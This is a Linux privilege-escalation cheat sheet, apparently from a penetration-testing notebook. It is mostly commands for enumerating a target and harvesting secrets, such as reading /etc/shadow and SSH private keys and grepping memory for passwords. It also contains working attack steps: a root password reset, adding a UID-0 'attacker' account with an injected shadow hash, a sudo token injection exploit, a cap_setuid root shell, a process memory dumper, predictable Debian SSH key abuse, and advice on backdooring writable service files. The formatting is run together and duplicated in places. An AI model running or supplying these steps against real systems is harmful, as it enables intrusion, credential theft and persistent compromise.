⭕Enumeration
quick commands to enumerate the target system. these are taken from different sources and combined together with a little modification.
system information
distribution type and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-releasekernel version
cat /proc/version
uname -a
uname -mrs
cat /proc/$$/status | grep "[UG]id"
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-places to find kernel exploits:
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack https://github.com/lucyoa/kernel-exploits https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits https://github.com/bwbwbwbw/linux-exploit-binaries
To extract all the vulnerable kernel versions from that web you can do:
curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' 'This technique is for kernels up to 3.9.6 and is not reliable for later versions of Linux kernel.
Tools that could help searching for kernel exploits are:
https://github.com/mzet-/linux-exploit-suggester https://github.com/jondonas/linux-exploit-suggester-2 http://www.securitysift.com/download/linuxprivchecker.py
Big UID
Some Linux versions were affected by a bug that allow users with UID > INT_MAX to escalate privileges. More info: here, here and here. Exploit it using:
systemd-run -t /bin/bash
sudo_inject
this has requirements, doesn't work all the time.
clone the repository and run the script:
requirements:
$ sudo whatever
[sudo] password for user: # Press+c since you don't have the password.
# This creates an invalid sudo tokens.
$ sh exploit.sh .... wait 1 seconds
$ sudo -i # no password required :)
# id
uid=0(root) gid=0(root) groups=0(root)for more methods related to sudo refer to sudo abuse section.
environmental variables
see environment variables section for methods
cat /etc/profile
cat /home/*/.bashrc | grep alias | grep -v "#"
cat /root/.bashrc | grep alias | grep -v "#"
cat ~/.bash_profile
cat ~/.bashrc cat ~/.bash_logout
env
setReset Root Password
echo "root:spotless" | chpasswdin-memory password
strings /dev/mem -n10 | grep -i PASSdriver info
lsmod /sbin/modinfo [lib] ls /dev 2>/dev/null | grep -i "sd" cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null `` #Check if credentials in fstab grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/nullavailable shells
cat /etc/shells |grep "bin"|cut -d "/" -f3 2>/dev/nullprogramming languages
progr_dev=( "which perl" "which gcc" "which g++" "which python" "which php" "which cc" "which go" "which node") ;for programming_lang in "${progr_dev[@]}"; do pss=`$programming_lang |cut -d"/" -f4` ;if [ "$pss" ]; then echo -e "$pss" ;fi donecheck emails
mail && ls -alh /var/mail/printers
lpstat -anetwork connections/hosts
lsof -i
lsof -i :80 grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn chkconfig --list
chkconfig --list | grep 3:on
last
w
cat /etc/sudoersavailable file transfer methods
find / -name wget
find / -name nc* find / -name netcat*
find / -name tftp*
find / -name ftpusers and accounts
Add User One-liner
python -c ‘import pty; pty.spawn(“/bin/bash”)’/var/wwwfind /usr/bin -perm -u=s -type ffind . -exec /bin/sh \; -quit/usr/sbin/useradd -ou 0 -g 0 attackersed -i ‘s/attacker:!:/attacker:$6$uW5y3OHZDcc0avXy$WiqPpaw7e2a7K8Z.oKMUgMzCAVooT0HWNMKDBbrBnBlUXbLr1lFnboJ1UkC013gPZhVIX85IZ4RCq4\/cVqpO00:/g’ /etc/shadowcheck for sudo access
sudo -l |grep vim sudo -l |grep nmap
sudo -l |grep vi
sudo -lusers UID and GID
for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user; doneUID 0 accounts (root)
cat /etc/passwd |cut -f1,3,4 -d":" |grep "0:0" |cut -f1 -d":"|awk '{print $1}'users readable history file
find /home/* -name *.*history* -print 2> /dev/nullcheck history
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_historyuser info
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/rootPossible defenses
AppArmor
if [ `which aa-status 2>/dev/null` ]; then
aa-status
elif [ `which apparmor_status 2>/dev/null` ]; then
apparmor_status
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
ls -d /etc/apparmor*
else
echo "Not found AppArmor"
fiGrsecurity
((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")PaX
PaX(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")Execshield
(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield") SElinux
(sestatus 2>/dev/null || echo "Not found sestatus") ASLR
cat /proc/sys/kernel/randomize_va_space 2>/dev/null #If 0, not enablednetwork
network configurations
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainnamenetwork status
ss -anp
netstat -ano
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
arp -e
route
/sbin/route -neetry packet sniffing
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21firewall rules
/etc/iptables
iptables -L
grep -Hs iptables /etc/*hosts and DNS
cat /etc/hosts 2>/dev/null && cat /etc/resolv.conf 2>/dev/null && cat /etc/sysconfig/network 2>/dev/null && cat /etc/networks 2>/dev/null | uniq | srt | grep -v '#'ssh root login status
cat /etc/ssh/sshd_config | grep PermitRootLogin | grep -v "#"ssh info
cat ~/.ssh/identity.pub ~/.ssh/authorized_keys ~/.ssh/identity ~/.ssh/id_rsa.pub ~/.ssh/id_rsa ~/.ssh/id_dsa.pub ~/.ssh/id_dsa /etc/ssh/ssh_config /etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key.pub /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_rsa_key.pub /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_key.pub /etc/ssh/ssh_host_key 2>/dev/nulltasks and processes
process binaries paths and permissions
ps aux | awk '{print $11}' |xargs -r ls -la 2>/dev/null |awk '!x[$0]++'find new running processes
#!/bin/bash #Loop by line IFS=$'\n' old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) while true; do new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0) diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] sleep 1 old_process=$new_processcheck services and privileges
ps aux ps -ef ps aux | grep "^root" top cat /etc/servicesWhich service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root ps -ef | grep rootWhat applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/ dpkg -l | grep rpm -qa | grep
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/scheduled Tasks
see cron/crontab abuse section for methods
ls -lah /etc/cron*
cat /etc/crontab crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/rootprocess monitoring
this can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met.
Process memory
Some services of a server save credentials in clear text inside the memory. Normally you will need root privileges to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials. However, remember that as a regular user you can read the memory of the processes you own. To dump a process memory you could use: https://github.com/hajzer/bash-memory-dump You can manually remove root requirements and dump process owned by you Script A.5 from https://www.delaat.net/rp/2016-2017/p97/report.pdf (root is required) ****
Process Memory Credentials
this tool will steal clear text credentials from memory and from some well known files. It requires root privileges to work properly.
/proc/$pid/maps & /proc/$pid/mem
For a given process ID, maps shows how memory is mapped within that processes' virtual address space; it also shows the permissions of each mapped region. The mem pseudo file exposes the processes memory itself. From the maps file we know which memory regions are readable and their offsets. We use this information to seek into the mem file and dump all readable regions to a file.
procdump() ( cat /proc/$1/maps | grep -Fv ".so" | grep " 0 " | awk '{print $1}' | ( IFS="-" while read a b; do dd if=/proc/$1/mem bs=$( getconf PAGESIZE ) iflag=skip_bytes,count_bytes \ skip=$(( 0x$a )) count=$(( 0x$b - 0x$a )) of="$1_mem_$a.bin" done ) cat $1*.bin > $1.dump rm $1*.bin )/dev/mem
/dev/mem provides access to the system's physical memory, not the virtual memory. The kernels virtual address space can be accessed using /dev/kmem. Typically, /dev/mem is only readable by root and kmem group.
strings /dev/mem -n10 | grep -i PASSprograms and software
enumerate useful binaries
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc rkt kubectl 2>/dev/nullenumerate compilers
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")installed software/packages
dpkg -l rpm -qservice(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
ls -alh /var/log ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/Services
Writable .service files
Check if you can write any .service file, if you can, you could modify it so it executes your backdoor when the service is started, restarted or stopped (maybe you will need to wait until the machine is rebooted). For example create your backdoor inside the .service file with ExecStart=/tmp/script.sh
Writable service binaries
Keep in mid that if you have write permissions over binaries being executed by services, you can change them for backdoors so when the services get re-executed the backdoors will be executed.
systemd PATH - Relative Paths
You can see the PATH used by systemd with:
systemctl show-environmentIf you find that you can write in any of the folders of the path you may be able to escalate privileges.You need to search for relative paths being used on service configurations
Then, create a executable with the same name as the relative path binary inside the systemd PATH folder you can write, and when the service is asked to execute the vulnerable action (Start, Stop, Reload), your backdoor will be executed (unprivileged users usually cannot start/stop services but check if you can using sudo -l).
files and directories
find all SUID/SGID binaries
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullcheck SUID/SGID abuse section to see methods.
see /etc/shadow & /etc/passwd section to see how you can use these files with read/write permission for privilege escalation.
see shared object injection section for methods related to SUID binaries and dynamically loadable libraries.
NFS mounts
showmount -e 192.168.1.25see NFS section for related methods.
find password in php files
find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/nullfind writable files
find / -writable -type d 2>/dev/nullfind SUID files
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/nullFind SUID files owned by root
find / -uid 0 –perm -4000 –type f 2>/dev/nullFind GUID files
find / -perm -2000 -type -f 2>/dev/nullFind world-writable files
find -perm -2 -type f 2>/dev/nullList all conf files in /etc/
ls -al /etc/*.conf grep pass* /etc/*.conf >>> containing passwordsconf files with “pass*” string
grep pass* /etc/*.conf
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;list of open files
lsof -nlast edited files
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"R/W Files and Directories
find / -writable -type d 2>/dev/nullmount volumes
cat /etc/fstab mount /bin/lsblksearch for SUID set
find / -perm -u=s -type f 2>/dev/nullplain text usernames/passwords
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # JoomlaWhat sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/ssh key info
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_keySSH Key Predictable PRNG (Authorized_Keys) Process\
use an obtained authorized_keys file on a host system. Needed : SSH-DSS String from authorized_keys file 1. Get the authorized_keys file. An example of this file would look like so:
ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ...
ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ...2. Since this is an ssh-dss key, we need to add that to our local copy of /etc/ssh/ssh_config and /etc/ssh/sshd_config:
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config
echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config /etc/init.d/ssh restart ``
/etc/init.d/ssh restart ``Get g0tmi1k's debian-ssh repository and unpack the keys:
git clone https://github.com/g0tmi1k/debian-ssh
git clone https://github.com/g0tmi1k/debian-ssh cd debian-ssh
cd debian-ssh tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz23. Grab the first 20 or 30 bytes from the key file shown above starting with the "AAAA..." portion and grep the unpacked keys with it as:
grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do:
ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 ``
ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 ``And you should connect without requiring a password. If stuck, the -vvv verbosity should provide enough details as to why.
log files
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.logCapabilities
List capabilities of binaries
/usr/bin/getcap -r /usr/bin
/usr/bin/getcap -r /usr/binEdit capabilities
/usr/bin/setcap -r /bin/ping # remove
/usr/bin/setcap -r /bin/ping # remove /usr/bin/setcap cap_net_raw+p /bin/ping # add
/usr/bin/setcap cap_net_raw+p /bin/ping # addInteresting capabilities Having the capability =ep means the binary has all the capabilities.
$ getcap openssl /usr/bin/openssl openssl=ep
$ getcap openssl /usr/bin/openssl openssl=epAlternatively the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything cap_setuid+ep # setuid
cap_dac_read_search # read anything cap_setuid+ep # setuidExample of privilege escalation with cap_setuid+ep
sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7 python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' sh-5.0# id uid=0(root) gid=1000(swissky) >
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' sh-5.0# id uid=0(root) gid=1000(swissky) >
Last updated